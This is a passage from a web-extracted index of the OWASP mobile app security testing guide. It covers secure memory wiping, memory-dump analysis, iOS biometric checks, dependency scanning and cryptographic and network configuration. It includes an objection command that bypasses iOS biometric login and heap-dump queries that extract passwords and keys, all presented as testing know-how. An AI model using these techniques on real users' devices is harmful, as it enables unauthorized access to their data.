This doesn't, however, guarantee that the content will be overwritten at runtime. To optimize the bytecode, the compiler will analyze and decide not to overwrite data because it will not be used afterwards (i.e., it is an unnecessary operation). Even if the code is in the compiled DEX, the optimization may occur during the just-in-time or ahead-of-time compilation in the VM.
There is no silver bullet for this problem because different solutions have different consequences. For example, you may perform additional calculations (e.g., XOR the data into a dummy buffer), but you'll have no way to know the extent of the compiler's optimization analysis. On the other hand, using the overwritten data outside the compiler's scope (e.g., serializing it in a temp file) guarantees that it will be overwritten but obviously impacts performance and maintenance.
Then, using Arrays.fill
to overwrite the data is a bad idea because the method is an obvious hooking target (see the chapter \"Tampering and Reverse Engineering on Android\" for more details).
The final issue with the above example is that the content was overwritten with zeroes only. You should try to overwrite critical objects with random data or content from non-critical objects. This will make it really difficult to construct scanners that can identify sensitive data on the basis of its management.
Below is an improved version of the previous example:
Example in Java:
byte[] nonSecret = somePublicString.getBytes(\"ISO-8859-1\");\nbyte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (int i = 0; i < secret.length; i++) {\n secret[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(secret);\n out.flush();\n out.close();\n }\n}\n
Example in Kotlin:
val nonSecret: ByteArray = somePublicString.getBytes(\"ISO-8859-1\")\nval secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (i in secret.indices) {\n secret[i] = nonSecret[i % nonSecret.size]\n }\n\n val out = FileOutputStream(\"/dev/null\")\n out.write(secret)\n out.flush()\n out.close()\n }\n}\n
For more information, take a look at Securely Storing Sensitive Data in RAM.
In the \"Static Analysis\" section, we mentioned the proper way to handle cryptographic keys when you are using AndroidKeyStore
or SecretKey
.
For a better implementation of SecretKey
, look at the SecureSecretKey
class below. Although the implementation is probably missing some boilerplate code that would make the class compatible with SecretKey
, it addresses the main security concerns:
Example in Java:
public class SecureSecretKey implements javax.crypto.SecretKey, Destroyable {\n private byte[] key;\n private final String algorithm;\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n public SecureSecretKey(final byte[] key, final String algorithm) {\n this.key = key.clone();\n this.algorithm = algorithm;\n }\n\n public String getAlgorithm() {\n return this.algorithm;\n }\n\n public String getFormat() {\n return \"RAW\";\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n public byte[] getEncoded() {\n if(null == key){\n throw new NullPointerException();\n }\n\n return key.clone();\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory.*/\n public void destroy() {\n if (isDestroyed()) {\n return;\n }\n\n byte[] nonSecret = new String(\"RuntimeException\").getBytes(\"ISO-8859-1\");\n for (int i = 0; i < key.length; i++) {\n key[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(key);\n out.flush();\n out.close();\n\n this.key = null;\n System.gc();\n }\n\n public boolean isDestroyed() {\n return key == null;\n }\n }\n
Example in Kotlin:
class SecureSecretKey(key: ByteArray, algorithm: String) : SecretKey, Destroyable {\n private var key: ByteArray?\n private val algorithm: String\n override fun getAlgorithm(): String {\n return algorithm\n }\n\n override fun getFormat(): String {\n return \"RAW\"\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n override fun getEncoded(): ByteArray {\n if (null == key) {\n throw NullPointerException()\n }\n return key!!.clone()\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory. */\n override fun destroy() {\n if (isDestroyed) {\n return\n }\n val nonSecret: ByteArray = String(\"RuntimeException\").toByteArray(charset(\"ISO-8859-1\"))\n for (i in key!!.indices) {\n key!![i] = nonSecret[i % nonSecret.size]\n }\n val out = FileOutputStream(\"/dev/null\")\n out.write(key)\n out.flush()\n out.close()\n key = null\n System.gc()\n }\n\n override fun isDestroyed(): Boolean {\n return key == null\n }\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n init {\n this.key = key.clone()\n this.algorithm = algorithm\n }\n}\n
Secure user-provided data is the final secure information type usually found in memory. This is often managed by implementing a custom input method, for which you should follow the recommendations given here. However, Android allows information to be partially erased from EditText
buffers via a custom Editable.Factory
.
EditText editText = ...; // point your variable to your EditText instance\nEditText.setEditableFactory(new Editable.Factory() {\n public Editable newEditable(CharSequence source) {\n ... // return a new instance of a secure implementation of Editable.\n }\n});\n
Refer to the SecureSecretKey
example above for an example Editable
implementation. Note that you will be able to securely handle all copies made by editText.getText
if you provide your factory. You can also try to overwrite the internal EditText
buffer by calling editText.setText
, but there is no guarantee that the buffer will not have been copied already. If you choose to rely on the default input method and EditText
, you will have no control over the keyboard or other components that are used. Therefore, you should use this approach for semi-confidential information only.
In all cases, make sure that sensitive data in memory is cleared when a user signs out of the application. Finally, make sure that highly sensitive information is cleared out the moment an Activity or Fragment's onPause
event is triggered.
Note that this might mean that a user has to re-authenticate every time the application resumes.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis will help you identify potential problems, but it can't provide statistics about how long data has been exposed in memory, nor can it help you identify problems in closed-source dependencies. This is where dynamic analysis comes into play.
There are various ways to analyze the memory of a process, e.g. live analysis via a debugger/dynamic instrumentation and analyzing one or more memory dumps.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a rooted or a non-rooted device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on Android\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -ZZ memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"Instead of dumping the memory to your host computer, you can alternatively use r2frida. With it, you can analyze and inspect the app's memory while it's running. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\".
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#explicitly-dumping-and-analyzing-the-java-heap","title":"Explicitly Dumping and Analyzing the Java Heap","text":"For rudimentary analysis, you can use Android Studio's built-in tools. They are on the Android Monitor tab. To dump memory, select the device and app you want to analyze and click Dump Java Heap. This will create a .hprof file in the captures directory, which is on the app's project path.
To navigate through class instances that were saved in the memory dump, select the Package Tree View in the tab showing the .hprof file.
For more advanced analysis of the memory dump, use the Eclipse Memory Analyzer Tool (MAT). It is available as an Eclipse plugin and as a standalone application.
To analyze the dump in MAT, use the hprof-conv platform tool, which comes with the Android SDK.
./hprof-conv memory.hprof memory-mat.hprof\n
MAT provides several tools for analyzing the memory dump. For example, the Histogram provides an estimate of the number of objects that have been captured from a given type, and the Thread Overview shows processes' threads and stack frames. The Dominator Tree provides information about keep-alive dependencies between objects. You can use regular expressions to filter the results these tools provide.
Object Query Language studio is a MAT feature that allows you to query objects from the memory dump with an SQL-like language. The tool allows you to transform simple objects by invoking Java methods on them, and it provides an API for building sophisticated tools on top of the MAT.
SELECT * FROM java.lang.String\n
In the example above, all String
objects present in the memory dump will be selected. The results will include the object's class, memory address, value, and retain count. To filter this information and see only the value of each string, use the following code:
SELECT toString(object) FROM java.lang.String object\n
Or
SELECT object.toString() FROM java.lang.String object\n
SQL supports primitive data types as well, so you can do something like the following to access the content of all char
arrays:
SELECT toString(arr) FROM char[] arr\n
Don't be surprised if you get results that are similar to the previous results; after all, String
and other Java data types are just wrappers around primitive data types. Now let's filter the results. The following sample code will select all byte arrays that contain the ASN.1 OID of an RSA key. This doesn't imply that a given byte array actually contains an RSA (the same byte sequence may be part of something else), but this is probable.
SELECT * FROM byte[] b WHERE toString(b).matches(\".*1\\.2\\.840\\.113549\\.1\\.1\\.1.*\")\n
Finally, you don't have to select whole objects. Consider an SQL analogy: classes are tables, objects are rows, and fields are columns. If you want to find all objects that have a \"password\" field, you can do something like the following:
SELECT password FROM \".*\" WHERE (null != password)\n
During your analysis, search for:
Repeating tests and memory dumps will help you obtain statistics about the length of data exposure. Furthermore, observing the way a particular memory segment (e.g., a byte array) changes may lead you to some otherwise unrecognizable sensitive data (more on this in the \"Remediation\" section below).
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/","title":"Testing the Device-Access-Security Policy","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#overview","title":"Overview","text":"Apps that process or query sensitive information should run in a trusted and secure environment. To create this environment, the app can check the device for the following:
To test the device-access-security policy that the app enforces, a written copy of the policy must be provided. The policy should define available checks and their enforcement. For example, one check could require that the app run only on Android 6.0 (API level 23) or a more recent version, closing the app or displaying a warning if the Android version is less than 6.0.
Check the source code for functions that implement the policy and determine whether it can be bypassed.
You can implement checks on the Android device by querying Settings.Secure for system preferences. Device Administration API offers techniques for creating applications that can enforce password policies and device encryption.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis depends on the checks enforced by the app and their expected behavior. If the checks can be bypassed, they must be validated.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/","title":"Testing Local Authentication","text":""},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#overview","title":"Overview","text":"The usage of frameworks in an app can be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using otool:
otool -L <AppName>.app/<AppName>\n
If LocalAuthentication.framework
is used in an app, the output will contain both of the following lines (remember that LocalAuthentication.framework
uses Security.framework
under the hood):
/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication\n/System/Library/Frameworks/Security.framework/Security\n
If Security.framework
is used, only the second one will be shown.
It is important to remember that the LocalAuthentication framework is an event-based procedure and as such, should not be the sole method of authentication. Though this type of authentication is effective on the user-interface level, it is easily bypassed through patching or instrumentation. Therefore, it is best to use the keychain service method, which means you should:
kSecAccessControlBiometryCurrentSet
(before iOS 11.3 kSecAccessControlTouchIDCurrentSet
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the keychain item. Whenever the user adds a fingerprint or facial representation to the device, it will automatically invalidate the entry in the Keychain. This makes sure that the keychain item can only ever be unlocked by users that were enrolled when the item was added to the keychain.kSecAccessControlBiometryAny
(before iOS 11.3 kSecAccessControlTouchIDAny
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the Keychain entry. The Keychain entry will survive any (re-)enroling of new fingerprints or facial representation. This can be very convenient if the user has a changing fingerprint. However, it also means that attackers, who are somehow able to enrole their fingerprints or facial representations to the device, can now access those entries as well.kSecAccessControlUserPresence
can be used as an alternative. This will allow the user to authenticate through a passcode if the biometric authentication no longer works. This is considered to be weaker than kSecAccessControlBiometryAny
since it is much easier to steal someone's passcode entry by means of shouldersurfing, than it is to bypass the Touch ID or Face ID service.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
or the kSecAttrAccessibleWhenPasscodeSet
protection class is set when the SecAccessControlCreateWithFlags
method is called. Note that the ...ThisDeviceOnly
variant will make sure that the keychain item is not synchronized with other iOS devices.Note, a data protection class specifies the access methodology used to secure the data. Each class uses different policies to determine when the data is accessible.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#dynamic-analysis","title":"Dynamic Analysis","text":"Objection Biometrics Bypass can be used to bypass LocalAuthentication. Objection uses Frida to instrument the evaluatePolicy
function so that it returns True
even if authentication was not successfully performed. Use the ios ui biometrics_bypass
command to bypass the insecure biometric authentication. Objection will register a job, which will replace the evaluatePolicy
result. It will work in both, Swift and Objective-C implementations.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass\n(agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable\n...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # (agent) [3mhtws9x47q] Localized Reason for auth requirement: Please authenticate yourself\n(agent) [3mhtws9x47q] OS authentication response: false\n(agent) [3mhtws9x47q] Marking OS response as True instead\n(agent) [3mhtws9x47q] Biometrics bypass hook complete\n
If vulnerable, the module will automatically bypass the login form.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/","title":"Testing Object Persistence","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#static-analysis","title":"Static Analysis","text":"All different flavors of object persistence share the following concerns:
There are several ways to perform dynamic analysis:
First see whether there is an update mechanism at all: if it is not yet present, it might mean that users cannot be forced to update. If the mechanism is present, see whether it enforces \"always latest\" and whether that is indeed in line with the business strategy. Otherwise check if the mechanism is supporting to update to a given version. Make sure that every entry of the application goes through the updating mechanism in order to make sure that the update-mechanism cannot be bypassed.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0080/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Finally, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#detecting-vulnerabilities-of-third-party-libraries","title":"Detecting vulnerabilities of third party libraries","text":"In order to ensure that the libraries used by the apps are not carrying vulnerabilities, one can best check the dependencies installed by CocoaPods or Carthage.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#swift-package-manager","title":"Swift Package Manager","text":"In case Swift Package Manager is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities:
First, at the root of the project, where the Package.swift file is located, type
swift build\n
Next, check the file Package.resolved for the actual versions used and inspect the given libraries for known vulnerabilities.
You can utilize the OWASP Dependency-Check's experimental Swift Package Manager Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's Package.swift file and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Package.swift\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#cocoapods","title":"CocoaPods","text":"In case CocoaPods is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Podfile is located, execute the following commands:
sudo gem install cocoapods\npod install\n
Next, now that the dependency tree has been built, you can create an overview of the dependencies and their versions by running the following commands:
sudo gem install cocoapods-dependencies\npod dependencies\n
The result of the steps above can now be used as input for searching different vulnerability feeds for known vulnerabilities.
Note:
You can utilize the OWASP Dependency-Check's experimental CocoaPods Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's *.podspec and/or Podfile.lock files and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Podfile.lock\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#carthage","title":"Carthage","text":"In case Carthage is used for third party dependencies, then the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Cartfile is located, type
brew install carthage\ncarthage update --platform iOS\n
Next, check the Cartfile.resolved for actual versions used and inspect the given libraries for known vulnerabilities.
Note, at the time of writing this chapter, there is no automated support for Carthage based dependency analysis known to the authors. At least, this feature was already requested for the OWASP DependencyCheck tool but not yet implemented (see the GitHub issue).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#discovered-library-vulnerabilities","title":"Discovered library vulnerabilities","text":"When a library is found to contain vulnerabilities, then the following reasoning applies:
In case frameworks are added manually as linked libraries:
In the case of copy-pasted sources: search the header files (in case of using Objective-C) and otherwise the Swift files for known method names for known libraries.
Next, note that for hybrid applications, you will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, you will have to check the C# dependencies.
Last, if the application is a high-risk application, you will end up vetting the library manually. In that case there are specific requirements for native code, which are similar to the requirements established by the MASVS for the application as a whole. Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises of two parts: the actual license verification and checking which libraries are involved in case of missing sources.
It need to be validated whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copy-right statements are noted as required by the license of the third party library.
When performing app analysis, it is important to also analyze the app dependencies (usually in form of libraries or so-called iOS Frameworks) and ensure that they don't contain any vulnerabilities. Even when you don't have the source code, you can still identify some of the app dependencies using tools like objection, MobSF or the otool -L
command. Objection is the recommended tool, since it provides the most accurate results and it is easy to use. It contains a module to work with iOS Bundles, which offers two commands: list_bundles
and list_frameworks
.
The list_bundles
command lists all of the application\u2019s bundles that are not related to Frameworks. The output contains executable name, bundle id, version of the library and path to the library.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_bundles\nExecutable Bundle Version Path\n------------ ----------------------------------------- --------- -------------------------------------------\nDVIA-v2 com.highaltitudehacks.DVIAswiftv2.develop 2 ...-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCoreGlyphs com.apple.CoreGlyphs 1 ...m/Library/CoreServices/CoreGlyphs.bundle\n
The list_frameworks
command lists all of the application\u2019s bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/","title":"Memory Corruption Bugs","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#static-analysis","title":"Static Analysis","text":"Are there native code parts? If so: check for the given issues in the general memory corruption section. Native code is a little harder to spot when compiled. If you have the sources then you can see that C files use .c source files and .h header files and C++ uses .cpp files and .h files. This is a little different from the .swift and the .m source files for Swift and Objective-C. These files can be part of the sources, or part of third party libraries, registered as frameworks and imported through various tools, such as Carthage, the Swift Package Manager or Cocoapods.
For any managed code (Objective-C / Swift) in the project, check the following items:
free
is called twice for a given region instead of once.UnsafePointer
can be managed wrongly, which will allow for various memory corruption issues.Unmanaged
manually, leading to wrong counter numbers and a too late/too soon release.A great talk is given on this subject at Realm academy and a nice tutorial to see what is actually happening is provided by Ray Wenderlich on this subject.
Please note that with Swift 5 you can only deallocate full blocks, which means the playground has changed a bit.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#dynamic-analysis","title":"Dynamic Analysis","text":"There are various tools provided which help to identify memory bugs within Xcode, such as the Debug Memory graph introduced in Xcode 8 and the Allocations and Leaks instrument in Xcode.
Next, you can check whether memory is freed too fast or too slow by enabling NSAutoreleaseFreedObjectCheckEnabled
, NSZombieEnabled
, NSDebugEnabled
in Xcode while testing the application.
There are various well written explanations which can help with taking care of memory management. These can be found in the reference list of this chapter.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/","title":"Make Sure That Free Security Features Are Activated","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#static-analysis","title":"Static Analysis","text":"You can use radare2 to check the binary security features.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
And run the following commands:
[0x1000180c8]> i~pic,canary\ncanary true\npic true\n
[0x1000180c8]> is~release,retain\n124 0x002951e0 0x1000891e0 LOCAL FUNC 0 imp.dispatch_release\n149 0x00294e80 0x100088e80 LOCAL FUNC 0 imp.objc_autorelease\n150 0x00294e8c 0x100088e8c LOCAL FUNC 0 imp.objc_autoreleasePoolPop\n151 0x00294e98 0x100088e98 LOCAL FUNC 0 imp.objc_autoreleasePoolPush\n152 0x00294ea4 0x100088ea4 LOCAL FUNC 0 imp.objc_autoreleaseReturnValue\n165 0x00294f40 0x100088f40 LOCAL FUNC 0 imp.objc_release\n167 0x00294f58 0x100088f58 LOCAL FUNC 0 imp.objc_retainAutorelease\n168 0x00294f64 0x100088f64 LOCAL FUNC 0 imp.objc_retainAutoreleaseReturnValue\n169 0x00294f70 0x100088f70 LOCAL FUNC 0 imp.objc_retainAutoreleasedReturnValue\n
All the features are enabled in these examples:
PIE (Position Independent Executable): indicated by the flag pic true
.
MH_EXECUTE
), not to dynamic libraries (MH_DYLIB
).Stack Canary: indicated by the flag canary true
.
ARC (Automatic Reference Counting): indicated by symbols such as objc_autorelease
or objc_retainAutorelease
.
These checks can be performed dynamically using objection. Here's one example:
com.yourcompany.PPClient on (iPhone: 13.2.3) [usb] # ios info binary\nName Type Encrypted PIE ARC Canary Stack Exec RootSafe\n-------------------- ------- ----------- ----- ----- -------- ------------ ----------\nPayPal execute True True True True False False\nCardinalMobile dylib False False True True False False\nFraudForce dylib False False True True False False\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/","title":"Verifying the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#static-analysis","title":"Static Analysis","text":"For each of the libraries that are used by the application, the used algorithms and cryptographic configurations need to be verified to make sure they are not deprecated and used correctly.
Pay attention to how-to-be-removed key-holding datastructures and plain-text data structures are defined. If the keyword let
is used, then you create an immutable structure which is harder to wipe from memory. Make sure that it is part of a parent structure which can be easily removed from memory (e.g. a struct
that lives temporally).
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#commoncryptor","title":"CommonCryptor","text":"If the app uses standard cryptographic implementations provided by Apple, the easiest way to determine the status of the related algorithm is to check for calls to functions from CommonCryptor
, such as CCCrypt
and CCCryptorCreate
. The source code contains the signatures of all functions of CommonCryptor.h. For instance, CCCryptorCreate
has following signature:
CCCryptorStatus CCCryptorCreate(\n CCOperation op, /* kCCEncrypt, etc. */\n CCAlgorithm alg, /* kCCAlgorithmDES, etc. */\n CCOptions options, /* kCCOptionPKCS7Padding, etc. */\n const void *key, /* raw key material */\n size_t keyLength,\n const void *iv, /* optional initialization vector */\n CCCryptorRef *cryptorRef); /* RETURNED */\n
You can then compare all the enum
types to determine which algorithm, padding, and key material is used. Pay attention to the keying material: the key should be generated securely - either using a key derivation function or a random-number generation function. Note that functions which are noted in chapter \"Cryptography for Mobile Apps\" as deprecated, are still programmatically supported. They should not be used.
Given the continuous evolution of all third party libraries, this should not be the place to evaluate each library in terms of static analysis. Still there are some points of attention:
There are various keywords to look for: check the libraries mentioned in the overview and static analysis of the section \"Verifying the Configuration of Cryptographic Standard Algorithms\" for which keywords you can best check on how keys are stored.
Always make sure that:
Check also the list of common cryptographic configuration issues.
Most of the recommendations for static analysis can already be found in chapter \"Testing Data Storage for iOS\". Next, you can read up on it at the following pages:
Hook cryptographic methods and analyze the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#static-analysis","title":"Static Analysis","text":"In Swift, the SecRandomCopyBytes
API is defined as follows:
func SecRandomCopyBytes(_ rnd: SecRandomRef?,\n _ count: Int,\n _ bytes: UnsafeMutablePointer<UInt8>) -> Int32\n
The Objective-C version is
int SecRandomCopyBytes(SecRandomRef rnd, size_t count, uint8_t *bytes);\n
The following is an example of the APIs usage:
int result = SecRandomCopyBytes(kSecRandomDefault, 16, randomBytes);\n
Note: if other mechanisms are used for random numbers in the code, verify that these are either wrappers around the APIs mentioned above or review them for their secure-randomness. Often this is too hard, which means you can best stick with the implementation above.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#dynamic-analysis","title":"Dynamic Analysis","text":"If you want to test for randomness, you can try to capture a large set of numbers and check with Burp's sequencer plugin to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#overview","title":"Overview","text":"All the presented cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Info.plist, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which ATS is ignored) or a badly configured cross-platform framework.
IMPORTANT: You should apply these tests to the app main code but also to any app extensions, frameworks or Watch apps embedded within the app as well.
For more information refer to the article \"Preventing Insecure Network Connections\" and \"Fine-tune your App Transport Security settings\" in the Apple Developer Documentation.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using URLSession
(which uses the standard URL Loading System from iOS) or Network
(for socket-level communication using TLS and access to TCP and UDP).
Identify the network APIs used by the app and see if it uses any low-level networking APIs.
Apple Recommendation: Prefer High-Level Frameworks in Your App: \"ATS doesn\u2019t apply to calls your app makes to lower-level networking interfaces like the Network framework or CFNetwork. In these cases, you take responsibility for ensuring the security of the connection. You can construct a secure connection this way, but mistakes are both easy to make and costly. It\u2019s typically safest to rely on the URL Loading System instead\" (see source).
If the app uses any low-level APIs such as Network
or CFNetwork
, you should carefully investigate if they are being used securely. For apps using cross-platform frameworks (e.g. Flutter, Xamarin, ...) and third party frameworks (e.g. Alamofire) you should analyze if they're being configured and used securely according to their best practices.
Make sure that the app:
These checks are orientative, we cannot name specific APIs since every app might use a different framework. Please use this information as a reference when inspecting the code.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-for-cleartext-traffic","title":"Testing for Cleartext Traffic","text":"Ensure that the app is not allowing cleartext HTTP traffic. Since iOS 9.0 cleartext HTTP traffic is blocked by default (due to App Transport Security (ATS)) but there are multiple ways in which an application can still send it:
NSAllowsArbitraryLoads
attribute to true
(or YES
) on NSAppTransportSecurity
in the app's Info.plist
.Info.plist
Check that NSAllowsArbitraryLoads
is not set to true
globally of for any domain.
If the application opens third party web sites in WebViews, then from iOS 10 onwards NSAllowsArbitraryLoadsInWebContent
can be used to disable ATS restrictions for the content loaded in web views.
